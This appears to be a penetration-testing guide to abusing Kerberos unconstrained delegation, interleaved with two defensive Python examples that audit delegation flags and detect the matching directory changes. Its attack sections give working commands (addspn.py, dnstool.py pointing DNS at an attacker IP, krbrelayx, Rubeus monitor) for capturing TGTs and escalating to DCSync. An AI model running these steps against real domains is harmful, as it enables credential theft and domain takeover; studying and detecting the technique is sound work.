
Unconstrained Delegation Abuse (KUD)

Gain a TGT as any user who authenticates to an attacker-controlled host that has unconstrained delegation set.

Requirements

  • Control of an account with unconstrained delegation.
    • TGTs cannot be captured for users who are members of "Protected Users" or are marked "Account is sensitive and cannot be delegated."
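The two requirements above map directly onto attributes a defender can audit: unconstrained delegation is the TRUSTED_FOR_DELEGATION bit (0x80000) in userAccountControl, "Account is sensitive and cannot be delegated" is the NOT_DELEGATED bit (0x100000), and Protected Users is group membership. The following is an added example (not part of the original page) that classifies constructed directory records the way such an audit would; the record fields, the Protected Users DN and the sample accounts are assumptions, so substitute real LDAP results to use it.

```python
# Added example: audit which accounts hold unconstrained delegation and which
# accounts are shielded from having their TGTs delegated at all.
# userAccountControl bit values are the documented Microsoft ones.
TRUSTED_FOR_DELEGATION = 0x80000    # unconstrained delegation
NOT_DELEGATED = 0x100000            # "Account is sensitive and cannot be delegated"
SERVER_TRUST_ACCOUNT = 0x2000       # domain controller computer account

# Assumed DN of the Protected Users group for this constructed domain.
PROTECTED_USERS_DN = "CN=Protected Users,CN=Users,DC=corp,DC=example"


def is_shielded(record):
    """True if a TGT for this account would never be forwarded to a
    delegating host: NOT_DELEGATED set, or member of Protected Users."""
    uac = int(record.get("userAccountControl", 0))
    return bool(uac & NOT_DELEGATED) or PROTECTED_USERS_DN in record.get("memberOf", [])


def audit(records):
    """Return three sorted name lists:
    domain_controllers - DCs, which carry TRUSTED_FOR_DELEGATION by default
    unconstrained      - every other account with the bit set (the finding)
    shielded           - accounts whose TGTs cannot be captured this way
    """
    report = {"domain_controllers": [], "unconstrained": [], "shielded": []}
    for r in records:
        name = r["sAMAccountName"]
        uac = int(r.get("userAccountControl", 0))
        if uac & TRUSTED_FOR_DELEGATION:
            if uac & SERVER_TRUST_ACCOUNT:
                report["domain_controllers"].append(name)
            else:
                report["unconstrained"].append(name)
        if is_shielded(r):
            report["shielded"].append(name)
    for names in report.values():
        names.sort()
    return report


# Constructed sample records (not real data); comments give the UAC bits set.
SAMPLE_RECORDS = [
    {"sAMAccountName": "DC01$", "userAccountControl": 0x82000, "memberOf": []},      # SERVER_TRUST + TRUSTED_FOR_DELEGATION
    {"sAMAccountName": "FILESRV$", "userAccountControl": 0x81000, "memberOf": []},   # WORKSTATION_TRUST + TRUSTED_FOR_DELEGATION
    {"sAMAccountName": "WS01$", "userAccountControl": 0x1000, "memberOf": []},       # WORKSTATION_TRUST only
    {"sAMAccountName": "svc_backup", "userAccountControl": 0x80200, "memberOf": []}, # NORMAL_ACCOUNT + TRUSTED_FOR_DELEGATION
    {"sAMAccountName": "da_admin", "userAccountControl": 0x100200, "memberOf": []},  # NORMAL_ACCOUNT + NOT_DELEGATED
    {"sAMAccountName": "jsmith", "userAccountControl": 0x200, "memberOf": [PROTECTED_USERS_DN]},
]

if __name__ == "__main__":
    for key, names in audit(SAMPLE_RECORDS).items():
        print(f"{key}: {', '.join(names) or '-'}")
```

Domain controllers are reported separately because the flag is expected there; the remediation list is the `unconstrained` bucket (FILESRV$ and svc_backup in the sample), and the `shielded` bucket shows which privileged accounts are already out of reach of this technique.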

Receive a TGT

TARGET = Computer with unconstrained delegation

Linux (Remotely)

  • Requires Windows Server 2012+

1. Add HOST/<ATTACKER> as an additional DNS host name (msDS-AdditionalDnsHostName) on TARGET$

addspn.py -u '<domain>\<TARGET>' -p ':<nt_hash>' -s 'HOST/<ATTACKER>' --additional <dc_fqdn_or_ip>

2. Add a DNS A record for <ATTACKER>.<domain_fqdn> pointing at the attacker host, authenticating as TARGET$

dnstool.py -u '<domain>\<TARGET>' -p ':<nt_hash>' -r '<ATTACKER>.<domain_fqdn>' -d '<ATTACKER_ip>' --action add <dc_fqdn_or_ip>

3. Verify DNS Record

nslookup <ATTACKER>.<domain_fqdn> <dc_fqdn_or_ip>

Wait a few minutes

4. Start krbrelayx

If the TARGET is a user:

krbrelayx --krbsalt '<salt>' --krbpass '<TARGET_password>'

User account SALT = <UPPERCASE_REALM_FQDN> + <case_sensitive_TARGET_username> (concatenate the values with no space).

If the TARGET is a machine:

krbrelayx --aesKey '<TARGET$_AES_KEY>'

5. Coerce Authentication

Coerce authentication to krbrelayx on the remote Linux host.

6. Use the TGT

If successful, krbrelayx receives a TGT and writes it to a ccache file. Use it:

export KRB5CCNAME=<tgt_user>.ccache
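Steps 1 and 2 of the remote procedure leave directory-audit artifacts: a value added to msDS-AdditionalDnsHostName on the delegating computer, written by that computer's own account, and a dnsNode object created under the AD-integrated zone whose name does not match the creating account. The following is an added detection example (not part of the original page or the krbrelayx project) run over constructed, simplified records modeled on Windows Security events 5136 and 5137; the field names and values are an assumption for the example, not copied from real log output, and the self-write and name-mismatch heuristics are the author's own.

```python
# Added example: flag the directory changes that steps 1 and 2 produce.
# Events are constructed and simplified (not real 5136/5137 output).
SAMPLE_EVENTS = [
    # Step 1 artifact: FILESRV$ adds an extra DNS host name to its own object.
    {"EventID": 5136, "SubjectUserName": "FILESRV$",
     "ObjectDN": "CN=FILESRV,CN=Computers,DC=corp,DC=example",
     "AttributeLDAPDisplayName": "msDS-AdditionalDnsHostName",
     "AttributeValue": "ATTACKER.corp.example", "OperationType": "Value Added"},
    # Step 2 artifact: FILESRV$ creates a DNS node for a name that is not its own.
    {"EventID": 5137, "SubjectUserName": "FILESRV$",
     "ObjectDN": "DC=ATTACKER,DC=corp.example,CN=MicrosoftDNS,DC=DomainDnsZones,DC=corp,DC=example",
     "ObjectClass": "dnsNode"},
    # Administrative change to the same attribute on another host: still worth review.
    {"EventID": 5136, "SubjectUserName": "dns_admin",
     "ObjectDN": "CN=WEB01,CN=Computers,DC=corp,DC=example",
     "AttributeLDAPDisplayName": "msDS-AdditionalDnsHostName",
     "AttributeValue": "intranet.corp.example", "OperationType": "Value Added"},
    # Unrelated attribute change: ignored.
    {"EventID": 5136, "SubjectUserName": "helpdesk",
     "ObjectDN": "CN=WS01,CN=Computers,DC=corp,DC=example",
     "AttributeLDAPDisplayName": "description",
     "AttributeValue": "Finance laptop", "OperationType": "Value Added"},
]


def first_rdn(dn):
    """Value of the first RDN of a DN: 'CN=FILESRV,CN=...' -> 'FILESRV'."""
    return dn.split(",", 1)[0].split("=", 1)[1]


def subject_host(event):
    """Normalise the acting account to a bare upper-case host name ('FILESRV$' -> 'FILESRV')."""
    return event["SubjectUserName"].rstrip("$").upper()


def is_self_write(event):
    """True when the acting account is the object being modified, e.g. a
    computer account editing its own entry (the pattern addspn.py produces)."""
    return subject_host(event) == first_rdn(event["ObjectDN"]).upper()


def detect(events):
    """Return (severity, message) findings for additional-DNS-host-name additions
    and for DNS nodes created under a name other than the creator's own."""
    findings = []
    for e in events:
        if (e["EventID"] == 5136
                and e.get("AttributeLDAPDisplayName") == "msDS-AdditionalDnsHostName"
                and e.get("OperationType") == "Value Added"):
            severity = "high" if is_self_write(e) else "medium"
            findings.append((severity,
                             f"{e['SubjectUserName']} added additional DNS host name "
                             f"{e['AttributeValue']} to {first_rdn(e['ObjectDN'])}"))
        elif e["EventID"] == 5137 and e.get("ObjectClass") == "dnsNode":
            node = first_rdn(e["ObjectDN"])
            if node.upper() != subject_host(e):
                findings.append(("medium",
                                 f"{e['SubjectUserName']} created DNS record {node} "
                                 f"that does not match its own host name"))
    return findings


if __name__ == "__main__":
    for severity, message in detect(SAMPLE_EVENTS):
        print(f"[{severity}] {message}")
```

Auditing of 5136/5137 requires a SACL on the relevant objects and the "Audit Directory Service Changes" subcategory enabled; the self-write rule is the stronger signal because a computer account normally has no reason to add host names to its own entry, while the administrative case is kept at medium so that legitimate cluster or alias changes can be reviewed rather than alerted on.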

Windows (Locally)

1. Listen for a TGT

Start the Rubeus listener:

Rubeus.exe monitor /interval:5

Rubeus prints a base64-encoded TGT when one is received.

2. Coerce Authentication

Coerce authentication to the Rubeus listener. If successful the Rubeus listener will receive a base64 TGT.

3. Use the TGT

Attack Paths

  • DCSync
    • If a TGT is captured for DC$ or some other privileged user.
  • Review discovery steps in the methodology

References